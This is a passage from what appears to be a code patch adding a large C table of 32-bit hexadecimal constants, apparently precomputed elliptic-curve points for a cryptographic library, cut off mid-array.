UINT32_C(0xD51C6C3E), UINT32_C(0x3A48D732), UINT32_C(0x263AA470), ++ UINT32_C(0xE36F7E2D), UINT32_C(0xE7C1C3AC), UINT32_C(0xD283FE68) }, ++ { UINT32_C(0xC04EE157), UINT32_C(0x7E284821), UINT32_C(0x7AE0E36D), ++ UINT32_C(0x92D789A7), UINT32_C(0x4EF67446), UINT32_C(0x132663C0), ++ UINT32_C(0xD2E1D0B4), UINT32_C(0x68012D5A), UINT32_C(0x5102B339), ++ UINT32_C(0xF6DB68B1), UINT32_C(0x983292AF), UINT32_C(0x465465FC) } }, ++ { { UINT32_C(0x68F1F0DF), UINT32_C(0xBB595EBA), UINT32_C(0xCC873466), ++ UINT32_C(0xC185C0CB), UINT32_C(0x293C703B), UINT32_C(0x7F1EB1B5), ++ UINT32_C(0xAACC05E6), UINT32_C(0x60DB2CF5), UINT32_C(0xE2E8E4C6), ++ UINT32_C(0xC676B987), UINT32_C(0x1D178FFB), UINT32_C(0xE1BB26B1) }, ++ { UINT32_C(0x7073FA21), UINT32_C(0x2B694BA0), UINT32_C(0x72F34566), ++ UINT32_C(0x22C16E2E), UINT32_C(0x01C35B99), UINT32_C(0x80B61B31), ++ UINT32_C(0x982C0411), UINT32_C(0x4B237FAF), UINT32_C(0x24DE236D), ++ UINT32_C(0xE6C59440), UINT32_C(0xE209E4A3), UINT32_C(0x4DB1C9D6) } }, ++ { { UINT32_C(0x7D69222B), UINT32_C(0xDF13B9D1), UINT32_C(0x874774B1), ++ UINT32_C(0x4CE6415F), UINT32_C(0x211FAA95), UINT32_C(0x731EDCF8), ++ UINT32_C(0x659753ED), UINT32_C(0x5F4215D1), UINT32_C(0x9DB2DF55), ++ UINT32_C(0xF893DB58), UINT32_C(0x1C89025B), UINT32_C(0x932C9F81) }, ++ { UINT32_C(0x7706A61E), UINT32_C(0x0996B220), UINT32_C(0xA8641C79), ++ UINT32_C(0x135349D5), UINT32_C(0x50130844), UINT32_C(0x65AAD76F), ++ UINT32_C(0x01FFF780), UINT32_C(0x0FF37C04), UINT32_C(0x693B0706), ++ UINT32_C(0xF57F238E), UINT32_C(0xAF6C9B3E), UINT32_C(0xD90A16B6) } }, ++ { { UINT32_C(0x2353B92F), UINT32_C(0x2F5D200E), UINT32_C(0x3FD7E4F9), ++ UINT32_C(0xE35D8729), UINT32_C(0xA96D745D), UINT32_C(0x26094833), ++ UINT32_C(0x3CBFFF3F), UINT32_C(0xDC351DC1), UINT32_C(0xDAD54D6A), ++ UINT32_C(0x26D464C6), UINT32_C(0x53636C6A), UINT32_C(0x5CAB1D1D) }, ++ { UINT32_C(0xB18EC0B0), UINT32_C(0xF2813072), UINT32_C(0xD742AA2F), ++ UINT32_C(0x3777E270), UINT32_C(0x033CA7C2), UINT32_C(0x27F061C7), ++ UINT32_C(0x68EAD0D8), UINT32_C(0xA6ECACCC), UINT32_C(0xEE69A754), ++ UINT32_C(0x7D9429F4), UINT32_C(0x31E8F5C6), UINT32_C(0xE7706334) } }, ++ { { UINT32_C(0xB68B8C7D), UINT32_C(0xC7708B19), UINT32_C(0x44377ABA), ++ UINT32_C(0x4532077C), UINT32_C(0x6CDAD64F), UINT32_C(0x0DCC6770), ++ UINT32_C(0x147B6602), UINT32_C(0x01B8BF56), UINT32_C(0xF0561D79), ++ UINT32_C(0xF8D89885), UINT32_C(0x7BA9C437), UINT32_C(0x9C19E9FC) }, ++ { UINT32_C(0xBDC4BA25), UINT32_C(0x764EB146), UINT32_C(0xAC144B83), ++ UINT32_C(0x604FE46B), UINT32_C(0x8A77E780), UINT32_C(0x3CE81329), ++ UINT32_C(0xFE9E682E), UINT32_C(0x2E070F36), UINT32_C(0x3A53287A), ++ UINT32_C(0x41821D0C), UINT32_C(0x3533F918), UINT32_C(0x9AA62F9F) } }, ++ { { UINT32_C(0x75CCBDFB), UINT32_C(0x9B7AEB7E), UINT32_C(0xF6749A95), ++ UINT32_C(0xB25E28C5), UINT32_C(0x33B7D4AE), UINT32_C(0x8A7A8E46), ++ UINT32_C(0xD9C1BD56), UINT32_C(0xDB5203A8), UINT32_C(0xED22DF97), ++ UINT32_C(0xD2657265), UINT32_C(0x8CF23C94), UINT32_C(0xB51C56E1) }, ++ { UINT32_C(0x6C3D812D), UINT32_C(0xF4D39459), UINT32_C(0x87CAE0C2), ++ UINT32_C(0xD8E88F1A), UINT32_C(0xCF4D0FE3), UINT32_C(0x789A2A48), ++ UINT32_C(0xFEC38D60), UINT32_C(0xB7FEAC2D), UINT32_C(0x3B490EC3), ++ UINT32_C(0x81FDBD1C), UINT32_C(0xCC6979E1), UINT32_C(0x4617ADB7) } }, ++ { { UINT32_C(0x4709F4A9), UINT32_C(0x446AD888), UINT32_C(0xEC3DABD8), ++ UINT32_C(0x2B7210E2), UINT32_C(0x50E07B34), UINT32_C(0x83CCF195), ++ UINT32_C(0x789B3075), UINT32_C(0x59500917), UINT32_C(0xEB085993), ++ UINT32_C(0x0FC01FD4), UINT32_C(0x4903026B), UINT32_C(0xFB62D26F) }, ++ { UINT32_C(0x6FE989BB), UINT32_C(0x2309CC9D), UINT32_C(0x144BD586), ++ UINT32_C(0x61609CBD), UINT32_C(0xDE06610C), UINT32_C(0x4B23D3A0), ++ UINT32_C(0xD898F470), UINT32_C(0xDDDC2866), UINT32_C(0x400C5797), ++ UINT32_C(0x8733FC41), UINT32_C(0xD0BC2716), UINT32_C(0x5A68C6FE) } }, ++ { { UINT32_C(0x4B4A3CD0), UINT32_C(0x8903E130), UINT32_C(0x8FF1F43E), ++ UINT32_C(0x3EA4EA4C), UINT32_C(0xF655A10D), UINT32_C(0xE6FC3F2A), ++ UINT32_C(0x524FFEFC), UINT32_C(0x7BE3737D), UINT32_C(0x5330455E), ++ UINT32_C(0x9F692855), UINT32_C(0xE475CE70), UINT32_C(0x524F166E) }, ++ { UINT32_C(0x6C12F055), UINT32_C(0x3FCC69CD), UINT32_C(0xD5B9C0DA), ++ UINT32_C(0x4E23B6FF), UINT32_C(0x336BF183), UINT32_C(0x49CE6993), ++ UINT32_C(0x4A54504A), UINT32_C(0xF87D6D85), UINT32_C(0xB3C2677A), ++ UINT32_C(0x25EB5DF1), UINT32_C(0x55B164C9), UINT32_C(0xAC37986F) } }, ++ { { UINT32_C(0xBAA84C08), UINT32_C(0x82A2ED4A), UINT32_C(0x41A8C912), ++ UINT32_C(0x22C4CC5F), UINT32_C(0x154AAD5E), UINT32_C(0xCA109C3B), ++ UINT32_C(0xFC38538E), UINT32_C(0x23891298), UINT32_C(0x539802AE), ++ UINT32_C(0xB3B6639C), UINT32_C(0x0390D706), UINT32_C(0xFA0F1F45) }, ++ { UINT32_C(0xB0DC21D0), UINT32_C(0x46B78E5D), UINT32_C(0xC3DA2EAC), ++ UINT32_C(0xA8C72D3C), UINT32_C(0x6FF2F643), UINT32_C(0x9170B378), ++ UINT32_C(0xB67F30C3), UINT32_C(0x3F5A799B), UINT32_C(0x8264B672), ++ UINT32_C(0x15D1DC77), UINT32_C(0xE9577764), UINT32_C(0xA1D47B23) } }, ++ { { UINT32_C(0x0422CE2F), UINT32_C(0x08265E51), UINT32_C(0xDD2F9E21), ++ UINT32_C(0x88E0D496), UINT32_C(0x6177F75D), UINT32_C(0x30128AA0), ++ UINT32_C(0xBD9EBE69), UINT32_C(0x2E59AB62), UINT32_C(0x5DF0E537), ++ UINT32_C(0x1B1A0F6C), UINT32_C(0xDAC012B5), UINT32_C(0xAB16C626) }, ++ { UINT32_C(0x008C5DE7), UINT32_C(0x8014214B), UINT32_C(0x38F17BEA), ++ UINT32_C(0xAA740A9E), UINT32_C(0x8A149098), UINT32_C(0x262EBB49), ++ UINT32_C(0x8527CD59), UINT32_C(0xB454111E), UINT32_C(0xACEA5817), ++ UINT32_C(0x266AD15A), UINT32_C(0x1353CCBA), UINT32_C(0x21824F41) } }, ++ { { UINT32_C(0x12E3683B), UINT32_C(0xD1B4E74D), UINT32_C(0x569B8EF6), ++ UINT32_C(0x990ED20B), UINT32_C(0x429C0A18), UINT32_C(0xB9D3DD25), ++ UINT32_C(0x2A351783), UINT32_C(0x1C75B8AB), UINT32_C(0x905432F0), ++ UINT32_C(0x61E4CA2B), UINT32_C(0xEEA8F224), UINT32_C(0x80826A69) }, ++ { UINT32_C(0xEC52ABAD), UINT32_C(0x7FC33A6B), UINT32_C(0xA65E4813), ++ UINT32_C(0x0BCCA3F0), UINT32_C(0xA527CEBE), UINT32_C(0x7AD8A132), ++ UINT32_C(0xEAF22C7E), UINT32_C(0xF0138950), UINT32_C(0x566718C1), ++ UINT32_C(0x282D2437), UINT32_C(0xE2212559), UINT32_C(0x9DFCCB0D) } }, ++ { { UINT32_C(0x58CE3B83), UINT32_C(0x1E937227), UINT32_C(0x3CB3FB36), ++ UINT32_C(0xBB280DFA), UINT32_C(0xE2BE174A), UINT32_C(0x57D0F3D2), ++ UINT32_C(0x208ABE1E), UINT32_C(0x9BD51B99), UINT32_C(0xDE248024), ++ UINT32_C(0x3809AB50), UINT32_C(0xA5BB7331), UINT32_C(0xC29C6E2C) }, ++ { UINT32_C(0x61124F05), UINT32_C(0x9944FD2E), UINT32_C(0x9009E391), ++ UINT32_C(0x83CCBC4E), UINT32_C(0x9424A3CC), UINT32_C(0x01628F05), ++ UINT32_C(0xEA8E4344), UINT32_C(0xD6A2F51D), UINT32_C(0x4CEBC96E), ++ UINT32_C(0xDA3E1A3D), UINT32_C(0xE97809DC), UINT32_C(0x1FE6FB42) } }, ++ { { UINT32_C(0x467D66E4), UINT32_C(0xA04482D2), UINT32_C(0x4D78291D), ++ UINT32_C(0xCF191293), UINT32_C(0x482396F9), UINT32_C(0x8E0D4168), ++ UINT32_C(0xD18F14D0), UINT32_C(0x7228E2D5), UINT32_C(0x9C6A58FE), ++ UINT32_C(0x2F7E8D50), UINT32_C(0x373E5AEC), UINT32_C(0xE8CA780E) }, ++ { UINT32_C(0x1B68E9F8), UINT32_C(0x42AAD1D6), UINT32_C(0x69E2F8F4), ++ UINT32_C(0x58A6D7F5), UINT32_C(0x31DA1BEA), UINT32_C(0xD779ADFE), ++ UINT32_C(0x38C85A85), UINT32_C(0x7D265406), UINT32_C(0xD44D3CDF), ++ UINT32_C(0x67E67195), UINT32_C(0xC5134ED7), UINT32_C(0x17820A0B) } }, ++ { { UINT32_C(0xD3021470), UINT32_C(0x019D6AC5), UINT32_C(0x780443D6), ++ UINT32_C(0x25846B66), UINT32_C(0x55C97647), UINT32_C(0xCE3C15ED), ++ UINT32_C(0x0E3FEB0F), UINT32_C(0x3DC22D49), UINT32_C(0xA7DF26E4), ++ UINT32_C(0x2065B7CB), UINT32_C(0x187CEA1F), UINT32_C(0xC8B00AE8) }, ++ { UINT32_C(0x865DDED3), UINT32_C(0x1A5284A0), UINT32_C(0x20C83DE2), ++ UINT32_C(0x293C1649), UINT32_C(0xCCE851B3), UINT32_C(0xAB178D26), ++ UINT32_C(0x404505FB), UINT32_C(0x8E6DB10B), UINT32_C(0x90C82033), ++ UINT32_C(0xF6F57E71), UINT32_C(0x5977F16C), UINT32_C(0x1D2A1C01) } }, ++ { { UINT32_C(0x7C8906A4), UINT32_C(0xA39C8931), UINT32_C(0x9E821EE6), ++ UINT32_C(0xB6E7ECDD), UINT32_C(0xF0DF4FE6), UINT32_C(0x2ECF8340), ++ UINT32_C(0x53C14965), UINT32_C(0xD42F7DC9), UINT32_C(0xE3BA8285), ++ UINT32_C(0x1AFB51A3), UINT32_C(0x0A3305D1), UINT32_C(0x6C07C404) }, ++ { UINT32_C(0x127FC1DA), UINT32_C(0xDAB83288), UINT32_C(0x374C4B08), ++ UINT32_C(0xBC0A699B), UINT32_C(0x42EB20DD), UINT32_C(0x402A9BAB), ++ UINT32_C(0x045A7A1C), UINT32_C(0xD7DD464F), UINT32_C(0x36BEECC4), ++ UINT32_C(0x5B3D0D6D), UINT32_C(0x6398A19D), UINT32_C(0x475A3E75) } }, ++ }, ++ { ++ { { UINT32_C(0x72876AE8), UINT32_C(0x31BDB483), UINT32_C(0x961ED1BF), ++ UINT32_C(0xE3325D98), UINT32_C(0x9B6FC64D), UINT32_C(0x18C04246), ++ UINT32_C(0x15786B8C), UINT32_C(0x0DCC15FA), UINT32_C(0x8E63DA4A), ++ UINT32_C(0x81ACDB06), UINT32_C(0xDADA70FB), UINT32_C(0xD3A4B643) }, ++ { UINT32_C(0xDEA424EB), UINT32_C(0x46361AFE), UINT32_C(0x89B92970), ++ UINT32_C(0xDC2D2CAE), UINT32_C(0x615694E6), UINT32_C(0xF389B61B), ++ UINT32_C(0x872951D2), UINT32_C(0x7036DEF1), UINT32_C(0xD93BADC7), ++ UINT32_C(0x40FD3BDA), UINT32_C(0x380A68D3), UINT32_C(0x45AB6321) } }, ++ { { UINT32_C(0x81A2703A), UINT32_C(0x23C1F744), UINT32_C(0xB9859136), ++ UINT32_C(0x1A5D075C), UINT32_C(0x5AFD1BFD), UINT32_C(0xA4F82C9D), ++ UINT32_C(0xF89D76FE), UINT32_C(0xA3D1E9A4), UINT32_C(0x75702F80), ++ UINT32_C(0x964F7050), UINT32_C(0xF56C089D), UINT32_C(0x182BF349) }, ++ { UINT32_C(0xBE0DA6E1), UINT32_C(0xE205FA8F), UINT32_C(0x0A40F8F3), ++ UINT32_C(0x32905EB9), UINT32_C(0x356D4395), UINT32_C(0x331A1004), ++ UINT32_C(0xFDBBDFDE), UINT32_C(0x58B78901), UINT32_C(0x9BA00E71), ++ UINT32_C(0xA52A1597), UINT32_C(0x55497A30), UINT32_C(0xE0092E1F) } }, ++ { { UINT32_C(0x70EE8F39), UINT32_C(0x5562A856), UINT32_C(0x64E52A9C), ++ UINT32_C(0x86B0C117), UINT32_C(0x09C75B8C), UINT32_C(0xC19F3174), ++ UINT32_C(0x24923F80), UINT32_C(0x21C7CC31), UINT32_C(0x8F5B291E), ++ UINT32_C(0xE63FE47F), UINT32_C(0x0DC08B05), UINT32_C(0x3D6D3C05) }, ++ { UINT32_C(0xEE0C39A1), UINT32_C(0x58AE455E), UINT32_C(0x0AD97942), ++ UINT32_C(0x78BEA431), UINT32_C(0x3EE3989C), UINT32_C(0x42C7C97F), ++ UINT32_C(0xF38759AE), UINT32_C(0xC1B03AF5), UINT32_C(0xBCF46899), ++ UINT32_C(0x1A673C75), UINT32_C(0x8D508C7D), UINT32_C(0x4831B7D3) } }, ++ { { UINT32_C(0xC552E354), UINT32_C(0x76512D1B), UINT32_C(0x273020FD), ++ UINT32_C(0x2B7EB6DF), UINT32_C(0x025A5F25), UINT32_C(0xD1C73AA8), ++ UINT32_C(0x5CBD2A40), UINT32_C(0x2ABA1929), UINT32_C(0xC88D61C6), ++ UINT32_C(0xB53CADC3), UINT32_C(0x098290F3), UINT32_C(0x7E66A95E) }, ++ { UINT32_C(0xAF4C5073), UINT32_C(0x72800ECB), UINT32_C(0x9DC63FAF), ++ UINT32_C(0x81F2725E), UINT32_C(0x282BA9D1), UINT32_C(0x14BF92A7), ++ UINT32_C(0xBD5F1BB2), UINT32_C(0x90629672), UINT32_C(0xA97C6C96), ++ UINT32_C(0x362F68EB), UINT32_C(0x7EA9D601), UINT32_C(0xB1D3BB8B) } }, ++ { { UINT32_C(0xA9C94429), UINT32_C(0x73878F7F), UINT32_C(0x456CA6D8), ++ UINT32_C(0xB35C3BC8), UINT32_C(0xF721923A), UINT32_C(0xD96F0B3C), ++ UINT32_C(0xE6D44FA1), UINT32_C(0x28D8F06C), UINT32_C(0xD5CD671A), ++ UINT32_C(0x94EFDCDC), UINT32_C(0x3F97D481), UINT32_C(0x0299AB93) }, ++ { UINT32_C(0x2FD1D324), UINT32_C(0xB7CED6EA), UINT32_C(0x7E932EC2), ++ UINT32_C(0xBD683208), UINT32_C(0xCB755A6E), UINT32_C(0x24ED31FB), ++ UINT32_C(0xE48781D2), UINT32_C(0xA636098E), UINT32_C(0xF0A4F297), ++ UINT32_C(0x8687C63C), UINT32_C(0x07478526), UINT32_C(0xBB523440) } }, ++ { { UINT32_C(0x34124B56), UINT32_C(0x2E5F7419), UINT32_C(0x4B3F02CA), ++ UINT32_C(0x1F223AE1), UINT32_C(0xE8336C7E), UINT32_C(0x6345B427), ++ UINT32_C(0xF5D0E3D0), UINT32_C(0x92123E16), UINT32_C(0x45E79F3A), ++ UINT32_C(0xDAF0D14D), UINT32_C(0x6F3BD0C6), UINT32_C(0x6ACA6765) }, ++ { UINT32_C(0x403813F4), UINT32_C(0xF6169FAB), UINT32_C(0x334A4C59), ++ UINT32_C(0x31DC39C0), UINT32_C(0xD589866D), UINT32_C(0x74C46753), ++ UINT32_C(0x984C6A5D), UINT32_C(0x5741511D), UINT32_C(0x97FED2D3), ++ UINT32_C(0xF2631287), UINT32_C(0x11614886), UINT32_C(0x5687CA1B) } }, ++ { { UINT32_C(0x33836D4B), UINT32_C(0x076D902A), UINT32_C(0x24AFB557), ++ UINT32_C(0xEC6C5C43), UINT32_C(0xA0516A0F), UINT32_C(0xA0FE2D1C), ++ UINT32_C(0x00D22ECC), UINT32_C(0x6FB8D737), UINT32_C(0xDAF1D7B3), ++ UINT32_C(0xF1DE9077), UINT32_C(0xD4C0C1EB), UINT32_C(0xE4695F77) }, ++ { UINT32_C(0xB4375573), UINT32_C(0x5F0FD8A8), UINT32_C(0x5E50944F), ++ UINT32_C(0x76238359), UINT32_C(0x635CD76F), UINT32_C(0x65EA2F28), ++ UINT32_C(0x25FDE7B0), UINT32_C(0x08547769), UINT32_C(0x51944304), ++ UINT32_C(0xB2345A2E), UINT32_C(0xA16C980D), UINT32_C(0x86EFA2F7) } }, ++ { { UINT32_C(0xBF4D1D63), UINT32_C(0x4CCBE2D0), UINT32_C(0x397366D5), ++ UINT32_C(0x32E33401), UINT32_C(0x71BDA2CE), UINT32_C(0xC83AFDDE), ++ UINT32_C(0x478ED9E6), UINT32_C(0x8DACE2AC), UINT32_C(0x763FDD9E), ++ UINT32_C(0x3AC6A559), UINT32_C(0xB398558F), UINT32_C(0x0FFDB04C) }, ++ { UINT32_C(0xAFB9D6B8), UINT32_C(0x6C1B99B2), UINT32_C(0x27F815DD), ++ UINT32_C(0x572BA39C), UINT32_C(0x0DBCF842), UINT32_C(0x9DE73EE7), ++ UINT32_C(0x29267B88), UINT32_C(0x2A3ED589), UINT32_C(0x15EBBBB3), ++ UINT32_C(0xD46A7FD3), UINT32_C(0xE29400C7), UINT32_C(0xD1D01863) } }, ++ { { UINT32_C(0xE1F89EC5), UINT32_C(0x8FB101D1), UINT32_C(0xF8508042), ++ UINT32_C(0xB87A1F53), UINT32_C(0x0ED7BEEF), UINT32_C(0x28C8DB24), ++ UINT32_C(0xACE8660A), UINT32_C(0x3940F845), UINT32_C(0xC6D453FD), ++ UINT32_C(0x4EACB619), UINT32_C(0x2BAD6160), UINT32_C(0x2E044C98) }, ++ { UINT32_C(0x80B16C02), UINT32_C(0x87928548), UINT32_C(0xC0A9EB64), ++ UINT32_C(0xF0D4BEB3), UINT32_C(0xC183C195), UINT32_C(0xD785B4AF), ++ UINT32_C(0x5E6C46EA), UINT32_C(0x23AAB0E6), UINT32_C(0xA930FECA), ++ UINT32_C(0x30F7E104), UINT32_C(0xD55C10FB), UINT32_C(0x6A1A7B8B) } }, ++ { { UINT32_C(0xDBFED1AA), UINT32_C(0xDA74EAEB), UINT32_C(0xDF0B025C), ++ UINT32_C(0xC8A59223), UINT32_C(0xD5B627F7), UINT32_C(0x7EF7DC85), ++ UINT32_C(0x197D7624), UINT32_C(0x02A13AE1), UINT32_C(0x2F785A9B), ++ UINT32_C(0x119E9BE1), UINT32_C(0x00D6B219), UINT32_C(0xC0B7572F) }, ++ { UINT32_C(0x6D4CAF30), UINT32_C(0x9B1E5126), UINT32_C(0x0A840BD1), ++ UINT32_C(0xA16A5117), UINT32_C(0x0E9CCF43), UINT32_C(0x5BE17B91), ++ UINT32_C(0x69CF2C9C), UINT32_C(0x5BDBEDDD), UINT32_C(0x4CF4F289), ++ UINT32_C(0x9FFBFBCF), UINT32_C(0x6C355CE9), UINT32_C(0xE1A62183) } }, ++ { { UINT32_C(0xA7B2FCCF), UINT32_C(0x056199D9), UINT32_C(0xCE1D784E), ++ UINT32_C(0x51F2E7B6), UINT32_C(0x339E2FF0), UINT32_C(0xA1D09C47), ++ UINT32_C(0xB836D0A9), UINT32_C(0xC8E64890), UINT32_C(0xC0D07EBE), ++ UINT32_C(0x2F781DCB), UINT32_C(0x3ACF934C), UINT32_C(0x5CF3C2AD) }, ++ { UINT32_C(0xA17E26AE), UINT32_C(0xE55DB190), UINT32_C(0x91245513), ++ UINT32_C(0xC9C61E1F), UINT32_C(0x61998C15), UINT32_C(0x83D7E6CF), ++ UINT32_C(0xE41D38E3), UINT32_C(0x4DB33C85), UINT32_C(0xC2FEE43D), ++ UINT32_C(0x74D5F91D), UINT32_C(0x36BBC826), UINT32_C(0x7EBBDB45) } }, ++ { { UINT32_C(0xCB655A9D), UINT32_C(0xE20EC7E9), UINT32_C(0x5C47D421), ++ UINT32_C(0x4977EB92), UINT32_C(0x3B9D72FA), UINT32_C(0xA237E12C), ++ UINT32_C(0xCBF7B145), UINT32_C(0xCAAEDBC1), UINT32_C(0x3B77AAA3), ++ UINT32_C(0x5200F5B2), UINT32_C(0xBDBE5380), UINT32_C(0x32EDED55) }, ++ { UINT32_C(0xE7C9B80A), UINT32_C(0x74E38A40), UINT32_C(0xAB6DE911), ++ UINT32_C(0x3A3F0CF8), UINT32_C(0xAD16AAF0), UINT32_C(0x56DCDD7A), ++ UINT32_C(0x8E861D5E), UINT32_C(0x3D292449), UINT32_C(0x985733E2), ++ UINT32_C(0xD6C61878), UINT32_C(0x6AA6CD5B), UINT32_C(0x2401FE7D) } }, ++ { { UINT32_C(0xB42E3686), UINT32_C(0xABB3DC75), UINT32_C(0xB4C57E61), ++ UINT32_C(0xAE712419), UINT32_C(0xB21B009B), UINT32_C(0x2C565F72), ++ UINT32_C(0x710C3699), UINT32_C(0xA5F1DA2E), UINT32_C(0xA5EBA59A), ++ UINT32_C(0x771099A0), UINT32_C(0xC10017A0), UINT32_C(0x4DA88F4A) }, ++ { UINT32_C(0x1927B56D), UINT32_C(0x987FFFD3), UINT32_C(0xC4E33478), ++ UINT32_C(0xB98CB8EC), UINT32_C(0xC2248166), UINT32_C(0xB224A971), ++ UINT32_C(0xDE1DC794), UINT32_C(0x5470F554), UINT32_C(0xE31FF983), ++ UINT32_C(0xD747CC24), UINT32_C(0xB5B22DAE), UINT32_C(0xB91745E9) } }, ++ { { UINT32_C(0x72F34420), UINT32_C(0x6CCBFED0), UINT32_C(0xA53039D2), ++ UINT32_C(0x95045E4D), UINT32_C(0x5A793944), UINT32_C(0x3B6C1154), ++ UINT32_C(0xDDB6B799), UINT32_C(0xAA114145), UINT32_C(0x252B7637), ++ UINT32_C(0xABC15CA4), UINT32_C(0xA5744634), UINT32_C(0x5745A35B) }, ++ { UINT32_C(0xDA596FC0), UINT32_C(0x05DC6BDE), UINT32_C(0xA8020881), ++ UINT32_C(0xCD52C18C), UINT32_C(0xD296BAD0), UINT32_C(0x03FA9F47), ++ UINT32_C(0x7268E139), UINT32_C(0xD8E2C129), UINT32_C(0x9EC450B0), ++ UINT32_C(0x58C1A98D), UINT32_C(0xDE48B20D), UINT32_C(0x909638DA) } }, ++ { { UINT32_C(0x9B7F8311), UINT32_C(0x7AFC30D4), UINT32_C(0x42368EA3), ++ UINT32_C(0x82A00422), UINT32_C(0x6F5F9865), UINT32_C(0xBFF95198), ++ UINT32_C(0xFC0A070F), UINT32_C(0x9B24F612), UINT32_C(0x620F489D), ++ UINT32_C(0x22C06CF2), UINT32_C(0x780F7DBB), UINT32_C(0x3C7ED052) }, ++ { UINT32_C(0x34DAFE9B), UINT32_C(0xDB87AB18), UINT32_C(0x9C4BBCA1), ++ UINT32_C(0x20C03B40), UINT32_C(0x59A42341), UINT32_C(0x5D718CF0), ++ UINT32_C(0x69E84538), UINT32_C(0x98631706), UINT32_C(0xD27D64E1), ++ UINT32_C(0x5557192B), UINT32_C(0xDA822766), UINT32_C(0x08B4EC52) } }, ++ { { UINT32_C(0xD66C1A59), UINT32_C(0xB2D986F6), UINT32_C(0x78E0E423), ++ UINT32_C(0x927DEB16), UINT32_C(0x49C3DEDC), UINT32_C(0x9E673CDE), ++ UINT32_C(0xF7ECB6CF), UINT32_C(0xFA362D84), UINT32_C(0x1BA17340), ++ UINT32_C(0x078E5F40), UINT32_C(0x1F4E489C), UINT32_C(0x934CA5D1) }, ++ { UINT32_C(0x64EEF493), UINT32_C(0xC03C0731), UINT32_C(0xD7931A7E), ++ UINT32_C(0x631A353B), UINT32_C(0x65DD74F1), UINT32_C(0x8E7CC3BB), ++ UINT32_C(0x702676A5), UINT32_C(0xD55864C5), UINT32_C(0x439F04BD), ++ UINT32_C(0x6D306AC4), UINT32_C(0x2BAFED57), UINT32_C(0x58544F67) } }, ++ }, ++ { ++ { { UINT32_C(0xEC074AEA), UINT32_C(0xB083BA6A), UINT32_C(0x7F0B505B), ++ UINT32_C(0x46FAC5EF), UINT32_C(0xFC82DC03), UINT32_C(0x95367A21), ++ UINT32_C(0x9D3679D8), UINT32_C(0x227BE26A), UINT32_C(0x7E9724C0), ++ UINT32_C(0xC70F6D6C), UINT32_C(0xF9EBEC0F), UINT32_C(0xCD68C757) }, ++ { UINT32_C(0x8FF321B2), UINT32_C(0x29DDE03E), UINT32_C(0x031939DC), ++ UINT32_C(0xF84AD7BB), UINT32_C(0x0F602F4B), UINT32_C(0xDAF590C9), ++ UINT32_C(0x49722BC4), UINT32_C(0x17C52888), UINT32_C(0x089B22B6), ++ UINT32_C(0xA8DF99F0), UINT32_C(0xE59B9B90), UINT32_C(0xC21BC5D4) } }, ++ { { UINT32_C(0x8A31973F), UINT32_C(0x4936C6A0), UINT32_C(0x83B8C205), ++ UINT32_C(0x54D442FA), UINT32_C(0x5714F2C6), UINT32_C(0x03AEE8B4), ++ UINT32_C(0x3F5AC25A), UINT32_C(0x139BD692), UINT32_C(0xB5B33794), ++ UINT32_C(0x6A2E42BA), UINT32_C(0x3FF7BBA9), UINT32_C(0x50FA1164) }, ++ { UINT32_C(0xF7E2C099), UINT32_C(0xB61D8643), UINT32_C(0xBD5C6637), ++ UINT32_C(0x2366C993), UINT32_C(0x72EB77FA), UINT32_C(0x62110E14), ++ UINT32_C(0x3B99C635), UINT32_C(0x3D5B96F1), UINT32_C(0xF674C9F2), ++ UINT32_C(0x956ECF64), UINT32_C(0xEF2BA250), UINT32_C(0xC56F7E51) } }, ++ { { UINT32_C(0xFF602C1B), UINT32_C(0x246FFCB6), UINT32_C(0x6E1258E0), ++ UINT32_C(0x1E1A1D74), UINT32_C(0x250E6676), UINT32_C(0xB4B43AE2), ++ UINT32_C(0x924CE5FA), UINT32_C(0x95C1B5F0), UINT32_C(0xEBD8C776), ++ UINT32_C(0x2555795B), UINT32_C(0xACD9D9D0), UINT32_C(0x4C1E03DC) }, ++ { UINT32_C(0x9CE90C61), UINT32_C(0xE1D74AA6), UINT32_C(0xA9C4B9F9), ++ UINT32_C(0xA88C0769), UINT32_C(0x95AF56DE), UINT32_C(0xDF74DF27), ++ UINT32_C(0xB331B6F4), UINT32_C(0x24B10C5F), UINT32_C(0x6559E137), ++ UINT32_C(0xB0A6DF9A), UINT32_C(0xC06637F2), UINT32_C(0x6ACC1B8F) } }, ++ { { UINT32_C(0x34B4E381), UINT32_C(0xBD8C0868), UINT32_C(0x30DFF271), ++ UINT32_C(0x278CACC7), UINT32_C(0x02459389), UINT32_C(0x87ED12DE), ++ UINT32_C(0xDEF840B6), UINT32_C(0x3F7D98FF), UINT32_C(0x5F0B56E1), ++ UINT32_C(0x71EEE0CB), UINT32_C(0xD8D9BE87), UINT32_C(0x462B5C9B) }, ++ { UINT32_C(0x98094C0F), UINT32_C(0xE6B50B5A), UINT32_C(0x508C67CE), ++ UINT32_C(0x26F3B274), UINT32_C(0x7CB1F992), UINT32_C(0x418B1BD1), ++ UINT32_C(0x4FF11827), UINT32_C(0x607818ED), UINT32_C(0x9B042C63), ++ UINT32_C(0xE630D93A), UINT32_C(0x8C779AE3), UINT32_C(0x38B9EFF3) } }, ++ { { UINT32_C(0x729C5431), UINT32_C(0xE8767D36), UINT32_C(0xBB94642C), ++ UINT32_C(0xA8BD07C0), UINT32_C(0x58F2E5B2), UINT32_C(0x0C11FC8E), ++ UINT32_C(0x547533FE), UINT32_C(0xD8912D48), UINT32_C(0x230D91FB), ++ UINT32_C(0xAAE14F5E), UINT32_C(0x676DFBA0), UINT32_C(0xC122051A) }, ++ { UINT32_C(0x5EA93078), UINT32_C(0x9ED4501F), UINT32_C(0xBD4BEE0A), ++ UINT32_C(0x2758515C), UINT32_C(0x94D21F52), UINT32_C(0x97733C6C), ++ UINT32_C(0x4AD306A2), UINT32_C(0x139BCD6D), UINT32_C(0x298123CC), ++ UINT32_C(0x0AAECBDC), UINT32_C(0x1CB7C7C9), UINT32_C(0x102B8A31) } }, ++ { { UINT32_C(0xFAF46675), UINT32_C(0x22A28E59), UINT32_C(0x10A31E7D), ++ UINT32_C(0x10757308), UINT32_C(0x2B4C2F4F), UINT32_C(0xC7EEAC84), ++ UINT32_C(0xB5EF5184), UINT32_C(0xBA370148), UINT32_C(0x8732E055), ++ UINT32_C(0x4A5A2866), UINT32_C(0xB887C36F), UINT32_C(0x14B8DCDC) }, ++ { UINT32_C(0x433F093D), UINT32_C(0xDBA8C85C), UINT32_C(0x1C9A201C), ++ UINT32_C(0x73DF549D), UINT32_C(0x70F927D8), UINT32_C(0x69AA0D7B), ++ UINT32_C(0xD7D2493A), UINT32_C(0xFA3A8685), UINT32_C(0x0A7F4013), ++ UINT32_C(0x6F48A255), 